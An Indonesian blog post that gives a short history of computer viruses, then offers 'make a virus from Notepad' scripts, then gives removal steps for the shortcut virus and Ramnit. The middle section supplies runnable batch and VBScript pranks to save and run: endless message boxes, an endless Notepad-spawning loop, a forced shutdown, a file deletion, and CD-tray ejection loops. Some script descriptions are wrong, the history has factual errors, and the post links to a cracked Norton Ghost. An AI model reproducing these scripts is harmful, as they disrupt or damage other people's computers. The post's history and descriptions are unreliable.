All About Virus Komputer (sejarah , cara membuat , dan cara mengahpus)

Diposting oleh Sabri pada tanggal
Sejarah Virus Komputer:
Pada mulanya..virus tercipta bersamaan dengan terciptanya komputer. Tepatnya pada tahun 1949, pencipta Electronic Discrete Variable Automatic Computer (EDVAC) yang juga merupakan salah seorang pencipta komputer, John Von Newman memaparkan suatu makalah hasil penemuannya. Makalah tersebut berjudul “Theory and Organization of Complicated Automata” , makalah tersebut berisi teori “self altering automata” yang merupakan hasil riset dari para ahli matematika. Dalam makalah tersebut dibahas kemungkinan program dapat menyebar dengan sendirinya.
Selanjutnya perkembangan virus komputer dilakukan pada tahun 1960 di AT&T Bell Laboratory, salah satu lab terbesar di dunia yang telah menghasilkan banyak hal seperti bahasa C++ dsb.
Di laboratorium ini peneliti membuat suatu permainan dengan suatu program berdasarkan penemuan jhon newman tersebut. Pada waktu istirahat, para peneliti tersebut membuat permainan (game) dengan suatu program yang mampu memperbanyak dirinya, menghancurkan program lawan dan mampu memperbaiki dirinya sendiri secara otomatis.
Permainan perang program ini disebut Core War. Pemenang permainan ini di pegang oleh pemilik program yang mempunyai sisa terbanyak dalam waktu tertentu. Permainan ini akhirnya menjadi permainan favorit di tiap – tiap lab untuk mengisi waktu istirahat para peneliti
Tetapi semakin lama program yang diciptakan semakin berbahaya. Akhirnya karena sadar akan bahaya yang ditimbulkan program tersebut, apalagi jika program tersebut sampai bocor keluar laboratorium, maka setiap selesai permainan, program tersebut selalu dihapus dan dimusnahkan.
Selain itu juga dilakukan pengawasan dan pengamanan yang semakin ketat terhadap permainan Core War ini.
Pada tahun 1970an, sebuah program yang diklaim dapat membantu kelancaran kerja dikenalkan oleh perusahaan xerox. Struktur program tersebut menyerupai virus. Namun sebenarnya program tersebut digunakan untuk memaksimalkan waktu dengan dapat melaksanakan dua proses secara bersamaan.
Baru pada tahun 1980an, program perang berhasil menyebar keluar dari laboratorium dan menjadi terbuka di kalangan umum. Dimulai oleh pemaparan seorang peneliti sekaligus asisten profesor di ohio Universitas Cincinati, fred cohen. Dia mendemonstrasikan sebuah program hasil penemuannya, yaitu program yang mampu menyebar secara cepat ke dalam komputer secara otomatis. Karena cara kerja dan penyebarannya yang menyerupai sebuah virus, maka program tersebut akhirnya Fred Cohen menyebutnya sebagai virus.
Sedangkan di indonesia sendiri, banyak penguna komputer pernah digemparkan dengan munculnya wabah virus pertama. Virus tersebut bernama virus ©Brain, atau yang lebih dikenal dengan nama virus Pakistan. Hal menggemparkan tersebut terjadi pada tahun 1988 di indonesia.

Membuat Virus Dari Notepad:
1. Message yg muncul terus menerus
cara nya buka notepad lalu masukan script di bawah ini :


@ECHO off
:
Begin
msg * Lagi ngapain ?
msg * Hayo buka apa ?
msg * Nanti dimarahin ama mak loe
msg * Makannya jangan sembrono !
msg * minta bantuan gih sono !
msg * Udah instal ulang aja !!!!
msg * tit............................
GOTO BEGIN


bisa dirubah sesuai keinginan anda!
save as type dirubah menjadi all files
simpan dengan berekstensi .bat contoh pakdhegirang.bat



2.  pertanyaan menjebak
script nya


@echo off
title quiz hari ini 
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top

simpan dengan .bat contoh contoh = quizcyber4rt.bat

3. Membuka notepad terus-menerus
script nya
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top

sama simpan dengan .bat

4. komputer mati sendiri dan ngirim message
script nya

Set wshShell
=wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

simpan dengan .vbs

5. buka tutup cd room terus menerus
script nya

Set oWMP = CreateObject
("WMPlayer.OCX.7")
Set colCDROMs =
oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

simpan dengan .vbs

Mengahpus virus shortcut:

CARA 1
Berikut 8 langkah praktis untuk mendepak virus yang mampu mengubah folder yang ada di dalam USB flash disk menjadi shortcut tersebut:

1. Nonaktifkan System Restore untuk sementara selama proses pembersihan.
2. Putuskan komputer yang akan dibersihkan dari jaringan.
3. Matikan proses virus yang aktif di memori dengan menggunakan tools Ice Sword. Setelah tools tersebut terinstal, pilih file yang mempunyai icon Microsoft Visual Basic Project kemudian klik Terminate Process. Silahkan download tools tersebut di http://icesword.en.softonic.com/
4. Hapus registri yang sudah dibuat oleh virus dengan cara:
  • Klik menu [Start]
  • Klik [Run]
  • Ketik REGEDIT.exe, kemudian klik tombol [OK]
  • Pada aplikasi Registry Editor, telusuri key [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
  • Kemudian hapus key yang mempunyai data [C:\Document and Settings\%user%].
5. Disable autoplay/autorun Windows. Copy script di bawah ini pada program notepad kemudian simpan dengan nama REPAIR.INF, install file tersebut dengan cara: Klik kanan REPAIR.INF ?> INSTALL

[Version]

Signature=?$Chicago$?

Provider=Vaksincom

[DefaultInstall]

AddReg=UnhookRegKey

DelReg=del

[UnhookRegKey]

HKLM, Software\CLASSES\batfile\shell\open\command,,,?"?%1″? %*?

HKLM, Software\CLASSES\comfile\shell\open\command,,,?"?%1″? %*?

HKLM, Software\CLASSES\exefile\shell\open\command,,,?"?%1″? %*?

HKLM, Software\CLASSES\piffile\shell\open\command,,,?"?%1″? %*?

HKLM, Software\CLASSES\regfile\shell\open\command,,,?regedit.exe ?%1″?

HKLM, Software\CLASSES\scrfile\shell\open\command,,,?"?%1″? %*?

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoDriveTypeAutoRun,0x000000ff,255

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer, NoDriveTypeAutoRun,0x000000ff,255

6. Hapus File induk dan file duplikat yang dibuat oleh virus termasuk di flash disk. Untuk mempercepat proses pencarian, Anda dapat menggunakan fungsi ?Search?. Sebelum melakukan pencarian sebaiknya tampilkan semua file yang tersembunyi dengan mengubah pada setting Folder Options.

Jangan sampai terjadi kesalahan pada saat menghapus file induk maupun file duplikat yang telah dibuat oleh virus. Lalu hapus file induk virus yang mempunyai ciri-ciri:

-. Icon Microsoft Visual Basic Project.
-. Ukuran File 128 KB (untuk varian lain akan mempunyai ukuran yang bervariasi).
-. Ekstesi file .EXE atau .SCR.
-. Type file Application atau Screen Saver.

Kemudian hapus File duplikat shortcut yang mempunyai ciri-ciri:
  • Icon Folder atau icon
  • Ekstensi .LNK
  • Type File Shortcut
  • Ukuran file 1 KB
Hapus juga file yang .DLL (contoh: ert.dll) dan file Autorun.inf di flash disk atau folder yang di-share. Sementara untuk menghindari virus tersebut aktif kembali, hapus file induk yang mempunyai ekstensi EXE atau SCR terlebih dahulu baru kemudian hapus file Shortcut (.LNK).

7. Tampilkan kembali folder yang telah disembunyikan oleh virus. Untuk mempercepat proses tersebut, silahkan download tools UnHide File and Folder di http://www.flashshare.com/bfu/download.html
Atau gunakan perintah berikut pada CMD
Code:
attrib -r -s -h -a "D:\NAMA_FILE_ATAU_FOLDER"


Setelah diinstall, pilih direktori [C:\Documents and settings] dan folder yang ada di flash disk dengan cara menggeser ke kolom yang sudah tersedia. Pada menu [Attributes] kosongkan semua pilihan yang ada, kemudian klik tombol [Change Attributes].

8. Install security patch Microsoft Windows Shell shortcut handling remote code execution vulnerability-MS10-046. Silakan download security patch tersebut di http://www.microsoft.com/technet/security/Bulletin/MS10-046.mspx

Seperti biasa, untuk pembersihan secara optimal dan menecegah infeksi ulang, sebaiknya install dan scan dengan antivirus yang up-to-date dan sudah dapat mendeteksi virus ini dengan baik.

CARA 2
Ciri-ciri virus shortcut :

Pertama-tama, setelah menginfeksi komputer, dia akan membuat file induk database.mdb di My Documents

Yang kedua adalah virus tersebut akan membuat file autorun.inf di setiap drive harddisk, flash disk, dan folder tanpa kecuali.

Yang ketiga adalah dia akan membuat file Thumb.db (hati-hati, perhatikan bahwa file ini tanpa huruf s sedangkan thumbnail cache yang asli di komputer memiliki tambahan huruf s alias thumbs.db) di setiap folder

Untuk memancing korban, dia akan membuat file Microsoft.lnk dan New Harry Potter and?.lnk di setiap folder yang jika dieksekusi akan langsung mengaktifkan virus tersebut.

Seperti halnya virus-virus lokal lainnya, dia akan membuat duplikat setiap folder namun kali ini bukan dengan ekstensi .exe melainkan extensi .ink alias shortcut.

Pada task manager terdapat proses services wscript.exe yang sedang berjalan. Dalam kondisi normal, tidak ada proses seperti ini.

Langkah-langkah menghapus virus shortcut :

1. Matikan System Restore. Sejak dulu saya selalu mematikan system restore segera setelah proses instalasi windows. Untuk keperluan backup dan imaging system, saya lebih memilih menggunakan third party seperti acronis ataupun Norton Ghost (baca dan dowload : Norton Ghost 15.0.0.35659 (2010) Full Serial Crack)

2. Matikan proses virus wsrcipt.exe (C:\WINDOWS\System32\wscript.exe)

Bisa menggunakan Process Explorer atau misc. tool pada HijackThis (baca dan download : HijackThis 2.0.2 ).

3. Hapus file virus database.mdb di My Documents..

4. Hapus file duplikat virus..

Untuk proses penghapusan, anda bisa menggunakan fasilitas search pada Windows.. Pada ?More advanced options?, pastikan option ?Search system folders? dan ?Search hidden files and folders? keduanya telah dicentang.

Search file dengan nama autorun.inf ukurannya 8 KB

Search file dengan nama Thumb.db ukurannya 8 KB

Search file dengan ekstensi .lnk.lnk ukurannya 1 KB

Hapus semua file yang ditemukan..

Untuk lebih memudahkan proses pencarian yang sekaligus menghapus file yang ditemukan, anda bisa menggunakan software UTool, sebuah freeware yang dapat anda download secara gratis. Program ini akan secara otomatis mencari dan kemudian menghapus file-file yang diinginkan (lihat gambar).

5. Hapus registry Autorun yang dibuat virus dengan menggunakan HijackThis..

Cari di bagian HKCU\..\Run: yang berhubungan dengan file database.mdb (pada gambar namun file database.mdb udah saya hapus)

Untuk lebih memantabkan proses pencegahan dan melindungi komputer kita dari serangan virus lokal yang sangat memusingkan ini, anda dapat melakukan hal-hal berikut:

1. Setelah proses instalasi windows, segera matikan system restore.

2. Install software third party misal Tweak UI atau Magic Tweak untuk mendisable autorun dan mencegah teraktivasinya file-file .inf. Mungkin pada Windows XP Professional, proses menon-aktifkan autorun bisa dilakukan dengan mudah, namun pada versi Win XP Home, anda memerlukan software ini. Tambahan informasi, program MagicTweak selain berfungsi menon-aktifkan autorn dapat juga digunakan untuk mencegah dijalankannya file-file .inf File autorun.inf yang biasanya merupakan awal dari berjangkitnya virus akan secara otomatis diubah menjadi murni file txt alias notepad oleh program ini dan dia tidak lagi bisa dieksekusi. Ini sangat membantu jika memang secara tidak sengaja kita mengaktifkan atau mengeksekusi autorun.inf meski proses autorun sudah didisable untuk semua drive (termasuk flash disk).

3. Setelah semua proses instalasi windows, driver, program, dan lain-lain telah selesai, segera backup image system anda menggunakan software macam Acronis True Image atau Norton Ghost, sehingga jika nanti ada masalah yang tidak dapat anda selesaikan dengan mudah, anda dapat merestoreasi backup system tersebut.

4. Jika perlu, instal juga Deep Freeze apabila komputer anda digunakan oleh banyak orang, sehingga settingan komputer tidak akan berubah-ubah.

5. Update info: Ciri-ciri virus terdapatnya virus shortcut pada flashdisk dapat diketahui dengan perbedaan icon flashdisk tersebut yang biasanya berbentuk seperti icon drive menjadi berubah seperti icon folder. Jika menemui icon seperti ini, berarti dalam flashdisk tersebut terdapat virus. Gunakan explorer dan buka flashdisk lewat explorer (jangan klik 2x dari my computer) dan hapus file autorun dan file2 tersangka virus lainnya secara manual dengan menekan shift + DEL (supaya tidak tersangkut di recycle bin). Rata-rata virus lokal dapat dicegah dengan cara manual seperti ini asalkan OPSI DISABLE AUTORUN pada windows dan/atau MagicTweak telah diaktifkan, dan juga OPSI DISABLE .INF FILE pada MagicTweak telah diaktifkan.

Nah, itu mungkin sedikit tips cara menghapus virus shortcut dan smoga komputer kamu setelah hapus virus shortcut jadi bebas deh dari virus shortcut.

Mengahpus virus ramnit:
Cara membasmi Ramnit Dengan Tuntas :
  1. Putuskan hubungan komputer dari jaringan guna mencegah infeksi ulang.
  2. Gunakan tools Chanet Splitter II jika anda ingin membuat komputer anda kebal dari Ramnit dengan satu tombol sekaligus memperbaiki file HTM/HTML yang di injeksi oleh Ramnit dan tidak dapat dibersihkan / di delete oleh antivirus / virus cleaner lain. Download Chanet Splitter II dari
    http://www.vaksin.com/2011/0811/immune from ramnit/CHANET SPLITTERII.exe
PENTING !!!
        Berikut beberapa kelebihan yang dimiliki oleh CHANET SPLITTER II adalah : (lihat gambar)
    1. Tetap GRATIS .
    2. Mampu mencari dan mematikan proses Ramnit yang aktif di memori secara otomatis pada saat CHANET SPLITTER di jalankan
    3. Mampu memperbaiki registri yang diubah oleh virus
    4. Mampu menghapus file induk Ramnit
    5. Proteksi PC agar kebal dari Ramnit
    6. Proteksi agar Ramnit tidak membuat file virus ke USB Flash
    7. Mencari dan memperbaiki file HTM/HTML yang terinfeksi Ramnit
Gambar : Chanet Splitter II, mampu memperbaiki file HTM/HTML yang terinfeksi Ramnit
Chanet Splitter II dibuat dengan itikad baik membantu para pengguna komputer yang mengalami masalah dengan Ramnit. PT. Vaksincom sudah melakukan pengetesan tools ini pada banyak komputer dengan OS berbeda seperti Windows XP, Windows Vista dan Windows 7 dan tidak menemukan masalah dan tools ini dapat berjalan dengan baik pada OS-OS tersebut di test lab kami. TETAPI tidak tertutup kemungkinan tools yang kami buat tidak kompatible dengan OS yang anda gunakan dan dapat menyebabkan ketidakstabilan sistem atau kehilangan data. Karena itu demi keamanan data anda kami harapkan anda melakukan backup atas data anda di komputer dengan baik dan benar. PT. Vaksincom dan pembuat tools ini tidak bertanggungjawab atas kerugian apapun yang disebabkan baik secara langsung atau tidak langsung atas penggunaan tools ini.
  1. Tools yang Kami sertakan ini HANYA digunakan untuk memperbaiki file HTM/HTML yang telah terinfeksi Ramnit saja. Untuk membersihkan file EXE / DLL di dalam sistem komputer yang sudah terinfeksi Ramnit anda dapat menggunakan Norman Ramnit Cleaner (pembersih khusus Ramnit) atau Norman Malware Cleaner yang dapat di http://www.vaksin.com/2011/0811/immune from ramnit/Norman_Ramnit_Cleaner.exe kemudian scan Full HDD termasuk Removable Media (USB Flash/HDD Eksternal) dengan menggunakan antivirus yang terupdate untuk membersihkan file EXE / DLL yang sudah terinfeksi. Jika Norman Ramnit Cleaner sudah kadaluarsa, silahkan download Norman Malware Cleaner yang dapat membasmi semua virus (bukan hanya Ramnit) dari http://normanasa.vo.llnwd.net/o29/public/Norman_Malware_Cleaner.exe
  2. Sangat disarankan untuk instal security patch Windows (MS10-046 KB2286198) ( http://www.microsoft.com/technet/security/bulletin/ms10-046.mspx )

Komentar

  1. Anonim21 Mei 2013 pukul 10.33

    Saya ada tengok dokumentari mengenai hal nie ... saya sokong pendapat awak dan
    harap isu nie mendapat perhatian lebih ramai pembaca .
    . terima kasih

    My homepage - Jawatan Kosong

    BalasHapus

Posting Komentar